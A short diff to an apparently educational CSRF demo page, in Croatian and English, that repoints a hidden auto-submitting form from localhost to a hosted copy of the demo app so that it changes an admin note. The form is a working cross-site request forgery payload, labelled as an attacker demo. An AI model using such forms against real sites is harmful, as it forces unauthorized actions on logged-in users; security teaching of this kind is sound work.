--- a/views/attacker.html
+++ b/views/attacker.html
@@ -4,7 +4,7 @@
   <h1>Attacker demo: CSRF form</h1>
   <p>Ova stranica automatski šalje POST na /change-note aplikacije (ako je dostupna), mijenjajući admin note.</p>
 
-  <form id="csrfForm" method="POST" action="http://localhost:3000/change-note">
+  <form id="csrfForm" method="POST" action="https://security-98py.onrender.com/change-note">
     <input type="hidden" name="note" value="CSRF napad">
   </form>
 
